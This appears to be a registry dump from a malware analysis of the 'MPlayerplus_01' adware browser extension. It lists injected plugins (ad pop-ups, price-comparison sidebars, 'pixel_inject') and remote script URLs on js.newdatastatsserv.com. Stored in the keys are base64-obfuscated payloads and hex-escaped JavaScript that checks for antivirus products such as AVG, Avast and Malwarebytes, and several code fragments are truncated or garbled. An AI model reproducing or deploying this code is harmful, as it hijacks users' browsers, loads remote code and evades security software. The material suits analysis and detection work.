"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTY3MjRjNTQ0MjUxNTcxYjE2MTYxZDJkMWUxODQwNGI1NTUxMGExNjE5MDg1NjViNGQxODE2MWU0YzEwNDMwZjAzMDYwZTE1MDYwMDBlNGMwMzFkMTg1YjExMDE1YTEyNGMwODFlNDcwZjE1MGYwMTE0MWEwNTBjMjQxYzUxMmIzZDMyMjczYzMxMzEzZjMxMjgzMTMwMmUzNjMyMmYzMjMyMzEyODJiM2Q1NzE2MWMxNzBjMTkwYTE1MzcwZDE1MTA0ZTNkM2QyZTJhMjMyNzMxMjMzYzM3MjczMDMyM2IyMzIxMmMyNTI3MmEzZDIxMjIzYzI5MmIzZDU3MTQwMzEyMmMwYzE1MDk0OTNkMmUzNjIxMmQzMTNlMmEyNTMwMjcyMzJhMzIzMjMyMzIzNjJkMzkyNzJlMmE1MTRlNjg0ZDU4NGM1NDQwMTkwMTA3MTIxMTM4MGEwMDU2NTg1MTU3MWIxNjE2MWQwYjU2NWI0ZDE4MTYxZTRjMTA0MzBmMDMwNjBlMTUwNjAwMGU0YzAzMWQxODViMTEwMTVhMTI0YzA4MWU0NzBmMTUwZjAxMTQxYTA1MGMyNDFjNTEyYjNkMzIyNzNjMzEzMTNmMzEyODMxMzAyZTM2MzIyZjMyMzIzMTI4MmIzZDU3MTYxYzE3MGMxOTBhMTUzNzBkMTUxMDRlM2QzZDJlMmEyMzI3MzEyMzNjMzcyNzMwMzIzYjIzMjEyYzI1MjcyYTNkMjEyMjNjMjkyYjNkNTcxNDAzMTIyYzBjMTUwOTQ5M2QyZTM2MjEyZDMxM2UyYTI1MzAyNzIzMmEzMjMyMzIzMjM2MmQzOTI3MmUyYTUxNGU2ODRkNTg0YzU0NDAwMTE5MDYwNTBiMDMzMTA4NTY1ODUxNDc0YjU0NjgxMA==', 'mxltbqusbb'); }"

[HKCU\Software\MPlayerplus_01\Plugins\36]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/36.js"

[HKCU\Software\MPlayerplus_01\Plugins\262]
"Name" = "pops_5_j_m"

[HKCU\Software\MPlayerplus_01\Plugins\230]
"Version" = "7"

[HKCU\Software\MPlayerplus_01\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi"

[HKCU\Software\MPlayerplus_01\Plugins\14]
"Version" = "11"

[HKCU\Software\MPlayerplus_01\Plugins\3]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Manifest]
"homepageurl" = "NA"

[HKCU\Software\MPlayerplus_01\Plugins\9]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/9.js"

[HKCU\Software\MPlayerplus_01\Plugins\91]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/91.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\MPlayerplus_01\Plugins\39]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/39.js"

[HKCU\Software\MPlayerplus_01\Plugins\38]
"Name" = "IECallbacks"

[HKCU\Software\MPlayerplus_01\Plugins\43]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins\281]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MGIxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMTJlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3MzMyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }"

[HKCU\Software\MPlayerplus_01\Plugins\221]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Manifest]
"ModeType" = "production"
"PluginsManifestVersion" = "93"

[HKCU\Software\MPlayerplus_01\Plugins\45]
"Name" = "IEOnRequest"

[HKCU\Software\MPlayerplus_01\Plugins\275]
"Version" = "3"

[HKCU\Software\MPlayerplus_01\Plugins\184]
"Version" = "10"

[HKCU\Software\MPlayerplus_01\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }"

[HKCU\Software\MPlayerplus_01\Plugins\64]
"Name" = "appApiMessage"

[HKCU\Software\MPlayerplus_01\Plugins\36]
"Name" = "IEBackground"

[HKCU\Software\MPlayerplus_01\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn㐳)"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA D4 DD 75 CB 86 A0 31 8F A3 75 ED 89 8F 72 10"

[HKCU\Software\MPlayerplus_01\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64"

[HKCU\Software\MPlayerplus_01\Plugins\211]
"Version" = "7"

[HKCU\Software\MPlayerplus_01\Plugins\39]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins\64]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/64.js"

[HKCU\Software\MPlayerplus_01\Plugins\9]
"Version" = "3"

[HKCU\Software\MPlayerplus_01\Plugins\3]
"Name" = "ie8_fix_2"

[HKCU\Software\MPlayerplus_01\Plugins\14]
"Name" = "CrossriderUtils"

[HKCU\Software\MPlayerplus_01\Plugins\39]
"Name" = "IEDatabase"

[HKCU\Software\MPlayerplus_01\Plugins\281]
"Name" = "ibario_tier3_pops_m"

[HKCU\Software\MPlayerplus_01\Plugins\273]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/273.js"

[HKCU\Software\MPlayerplus_01\Plugins\220]
"Version" = "23"

[HKCU\Software\MPlayerplus_01\Manifest]
"EnableSearchIE" = "false"

[HKCU\Software\MPlayerplus_01\Plugins\44]
"Name" = "IEMisc"

[HKCU\Software\MPlayerplus_01\Plugins\93]
"Name" = "superfish_no_coupons_m"

[HKCU\Software\MPlayerplus_01\Plugins\40]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/40.js"

[HKCU\Software\MPlayerplus_01\Plugins\93]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/93.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\MPlayerplus_01\Plugins\7]
"Name" = "hooks"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\MPlayerplus_01\Plugins\230]
"Name" = "revizer_ws_dynamic_b2b_2_m"

[HKCU\Software\MPlayerplus_01\Plugins\211]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk2ZjcxNDYwZTFjMGUwMjIyMDgwZTQ3NDI0NDQ0MDAwZTA2MDc0MDRkNGExOTE3MTQxZTU3MTM1OTFiMDkwNDE1MDUwZjAwMWU1YzE5MWYxNjRhMGIwMDQ5NTk0ZDQyNDc1NTUzNTU0YzUxNDgwMjA5NTA1YjcwNmI0NzEwMTAxMjE4MDkyNzA1MTY0MDVmNTg0NjBlMWMwZTAyMDQ0MDRkNGExOTE3MTQxZTU3MTM1OTFiMDkwNDE1MDUwZjAwMWU1YzE5MWYxNjRhMGIwMDQ5NTk0ZDQyNDc1NTUzNTU0YzUxNDgwMjA5NTA1YjcwNmI0NzA4MDgxMzBmMTMxYzNlMWU0MDVmNTg1NjU3NTk1Njc4NTc1YTQyNDU1YTEyMDMxYTBlMWIxNDFiMGU0NzQyNDQzZDRhMWIxNjA0NTgzZjQ5NzI0NDQ2NDg1YTUwMWUxNDBlMGMxNjAxMmMzYjU4NDg1NzU4MTUwYzE2MDAwOTFmNTQyZDA1MGMxODU0NGY1NDU2MTA0YjQyNDM0ZjQyNTg1ODFmNDY0ZjBhMDcxNTE2MGIxNjEwMDExNDM3MDkwNzE1MTMwNjQyNDI0NDQxMzcyNTMxMjUzNTMxMzYyYTJkMjIyZDI4MmQzMjIyMzYyMDM2MjAyMzJjMjUyMTIyMzgzZDJjM2MzYjM5NGY1NjUyNTAxYjA2MDExNzBhMDgwOTE3MTc1MDQwNDI0MjI3M2IyNTNhMzUyMTI0MjgyYjIxM2QzNjM5MjkyYTIyMjgzNDIzMjgzZDNiMzk0ZjA3NDk1NTcwMWY=', 'bexdfhzrwz'); }"

[HKCU\Software\MPlayerplus_01\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to parsã…¤)"

[HKCU\Software\MPlayerplus_01\Plugins\184]
"Name" = "noproblemppc_m"

[HKCU\Software\MPlayerplus_01\Plugins\289]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGM3YjQ3NGQ0NTQ2NDMwOTFmMGMwNzI0MTUwMTQ3NWM0MTQzMDMwYzAzMDE1ZDQyNGEwNzRmMTkwZDBhMTIxNDE0MDgxNzEwMDgwMjBlNTYxNDFlMGE0MjE1MDcxMzE1MDUxZDA1NWUwYTA0MDk1NDM3NTEzYzBiNTg0ZTA0MDQwMTViNTA1ODRkMGIxZTE1NWEzMjNhMjUzMzJlMzgyYjI1MzgyMzI4MzczOTI0MzkzZjNkMzkzNTIyMjkzYTM1MzQyMzM0MzEzMzJlMzg0YjA0MDIwNTIyMjk0NTQ2NTcwNjFkMTUxMjA4MTUwNzFkNGEyZTM4MmUzNzI5MzIzMjM5MzEzMzM0MzUzMjI0MzYzMTNlMjUzOTNhMzQzODMyNDc0YTZiNDE0YjU4NTc1MzBmMTkxMTE2MTIzNDE5MTQ1NTRiNDc0ZjBkMTIxNTExMTg0MjU4NWUwNjQzMWQwMDEzMDQwZTBiMTIwMzExMDQwNjAzNGYwMjA0MTU1ODAxMDYxZjExMDgwNDEzNDQxNTFlMWQ1NTNiNTUzMTEyNGU1NDFiMWUxNTVhNWM1YzQwMTIwODBmNDUyODJlMjQzZjJhMzUzMjMzMjIzYzMyMjMzODI4M2QzMjI0MmYyZjNkMzMyZTM0MzgyNzM5MjgyNTM0Mjc1MTEwMDMwOTI2MjQ1YzUwNGQxOTA3MDExMzA0MTEwYTA0NWMzNDI3MzQyMzI4M2UzNjM0MjgyNTJlMmEyODMwMzczZDNhMjgyMDJjMmUyNzI4NTM0YjY3NDU0NjQxNDE0OTA4MWIwNDAwMDQwYjJmMDU0MzUxNTg0NTQ5NWU2NzE4', 'wqgmefaakx'); }"

[HKCU\Software\MPlayerplus_01\Plugins\263]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/263.js"

[HKCU\Software\MPlayerplus_01\Plugins\180]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/180.js"

[HKCU\Software\MPlayerplus_01\Plugins\260]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/260.js"

[HKCU\Software\MPlayerplus_01\Plugins\2]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/2.js"

[HKCU\Software\MPlayerplus_01\Manifest]
"Version" = "102"

[HKCU\Software\MPlayerplus_01\Plugins\184]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/184.js"

[HKCU\Software\MPlayerplus_01\Plugins\38]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\286]
"Name" = "sp_j_m"

[HKCU\Software\MPlayerplus_01\Plugins\223]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/223.js"

[HKCU\Software\MPlayerplus_01\Plugins\192]
"Version" = "9"

[HKCU\Software\MPlayerplus_01\Plugins\242]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\41]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/41.js"

[HKCU\Software\MPlayerplus_01\Plugins\275]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg2MzcwNGUwNDA1MTExYTM2MDExZjRiNDM0YzRlMTkxMTFlMTM0OTVjNDYwZTFmNDIwMTE3MDMwMDE2MTcwYzBkMDkwZjA1NGIwOTBjMWU1YzFhNTYxYzA4MWIxNjVmNTA0YTRiNWIxODVmNWM0MDUzMDg1NDExNWQwMzBhNTMxZjE4MDE1NzNjMmMzMDNiMzYzZjNmMjMyYzJlMjYyMTJjMmMyMTM4MjkzZjIxMmYyNzJjMjAzYzNiMzMyNTM1M2EzNTQ1MTIwMzE5MTcwZDAxMTQ1ODM1M2MzMDIxMjYyYTNmM2UzODIxMmYzMTJjMzIzOTI5MzMyMjMwMjgyZjNjMmM1MTQ1NzM2NTRlMTkxMTFlMTMwMDI2MWIxNTRlNTY1MTQ3MDIxNzA3MDMxYTQzNDM0MzA2MTY0NDEzMDExYTBhMWMwODA5MDUwMDA5MTc1ZDEwMDYxNDQzMWY1ZTE1MGUwOTAwNDY1YTQwNTQ1ZTEwNTY1YTUyNDUxMTVlMWI0MjA2MDI1YTE5MGExNzRlMzYyNjJmM2UzZTM2MzkzMTNhMzcyYzJiMzMyOTI5MzEyZjJkMzczNjJkMjYzZjM5MzMzYTIzMjcyYzJjNGYxODFjMWMxZjA0MDcwNjRlMmMzNjNhM2UyMzIyMzYzODJhMzczNjNiMjYyZDNjMjEzYTI0MjIzZTM2MzYyNjRlNDA3YjZjNDgxMzFmMDYwZTEwMDIyNTE1NDc1MDQzNDE0NDVjNzMxMQ==', 'siyllqejcs'); }"

[HKCU\Software\MPlayerplus_01\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"

[HKCU\Software\MPlayerplus_01\Plugins\244]
"Name" = "engageya_inner_m"

[HKCU\Software\MPlayerplus_01\Manifest]
"SetNewTab" = "false"
"Manifest" = "NA"

[HKCU\Software\MPlayerplus_01\Plugins\40]
"Name" = "IEExtension"

[HKCU\Software\MPlayerplus_01\Plugins\102]
"Version" = "10"

[HKCU\Software\MPlayerplus_01\Plugins\78]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins\233]
"Name" = "revizer_p_dynamic_b2b_2_m"

[HKCU\Software\MPlayerplus_01\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

[HKCU\Software\MPlayerplus_01\Plugins\45]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/45.js"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\MPlayerplus_01\Plugins\226]
"Name" = "set_campaign_id_m"

[HKCU\Software\MPlayerplus_01\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(g){var i=(function(){var u={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64:)"

[HKCU\Software\MPlayerplus_01\Plugins\262]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDIw)"

[HKCU\Software\MPlayerplus_01\Plugins\44]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/44.js"

[HKCU\Software\MPlayerplus_01\Plugins\244]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/244.js"

[HKCU\Software\MPlayerplus_01\Plugins\104]
"Name" = "jollywallet_m"

[HKCU\Software\MPlayerplus_01\Plugins\263]
"Name" = "intext_5_j_m"

[HKCU\Software\MPlayerplus_01\Manifest]
"ThanksUrl" = "NA"
"UninstallerOfferUrl" = "NA"

[HKCU\Software\MPlayerplus_01\Plugins\7]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=bǏ)"

[HKCU\Software\MPlayerplus_01\Manifest]
"Description" = "MediaPlayerEnhance Extension"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\MPlayerplus_01\Manifest]
"DisableIe" = "true"

[HKCU\Software\MPlayerplus_01\Plugins\275]
"Name" = "pricedetect_sidebar_small_m"

[HKCU\Software\MPlayerplus_01\Plugins\273]
"Name" = "aedgency_back_button_m"

[HKCU\Software\MPlayerplus_01\Plugins\42]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/42.js"

[HKCU\Software\MPlayerplus_01\Plugins\230]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM3YzY3NDMwMDFlMWUwODNkMWYxNDU0NTQ0MTRhMDIxZTBjMTg1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDA2MTUxYzFhMTkyZDFhMDE1YTRjNGU0MzAwMWUxZTA4MWI1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDFlMGQxZDBkMDMxNjIxMDk1YTRjNGU1MzViNWE0NjcyNDg0ZDU4NTY0YzE3MGQxODFlMTEwYjBjMTQ1NDU0NDEzMzQ4MGIxYzFiNGYyNTVhNjQ0MTQ4NGE0YTVhMDEwMzE0MWYwMDA0MjIzOTQ4NDI0ODRmMGYxZjAwMDUwNzFkNDQyNzFhMWIwMjQ3NTk1MTU4MTI1YjQ4NWM1YjU4NGI0ZTFhNDg0ZDFhMGQwYTAxMTEwNTA2MDQxYTM1MTkwZDBhMDQxYzUxNTQ0MTRmMzUzNTNiM2EyMjJiMjUzYzI4MmMyZjM4MjcyZDM1MmMzMzIwMjUyZDJlMzUyYjNkMmYyNzNmMmEzZTM3NGQ0NjU4NGYwYzFjMTIwMTBmMDYwYjA3MWQ0ZjU3NTg1MTMxM2UyYjM4MjUyYjNiM2YzMTMyMmIzMzM3MmIzYTI4MzcyMzM5M2IyYjNlMzc0ZDE3NDM0YTY3MDU=', 'xvnahjjxhm'); }"

[HKCU\Software\MPlayerplus_01\Plugins\91]
"JavaScript" = "(function(K){var y=[].slice;var x={};var a=function(ap){if(typeof ap==string&&typeof ap.trim==function){return ap.trim();}return ap==null?:ap.toString().replace(/^\s /,).replace(/\s $/,);};function f(ap){var aq=x[ap]={},ar,at;ap=ap.split(/\s /);for(ar=0,at=ap.length;ar
[HKCU\Software\MPlayerplus_01\Plugins\263]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\MPlayerplus_01\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

[HKCU\Software\MPlayerplus_01\Plugins\195]
"Version" = "28"

[HKCU\Software\MPlayerplus_01\Plugins\253]
"Name" = "pixel_inject"

[HKCU\Software\MPlayerplus_01\Plugins\36]
"Version" = "8"

[HKCU\Software\MPlayerplus_01\Plugins\253]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/253.js"

[HKCU\Software\MPlayerplus_01\Plugins\45]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\43]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/43.js"

[HKCU\Software\MPlayerplus_01\Plugins\211]
"Name" = "revizer_ws_dynamic_b2b_light_m"

[HKCU\Software\MPlayerplus_01\Plugins\195]
"Name" = "icm_convertmedia_m"

[HKCU\Software\MPlayerplus_01\Plugins\269]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/269.js"

[HKCU\Software\MPlayerplus_01\Plugins]
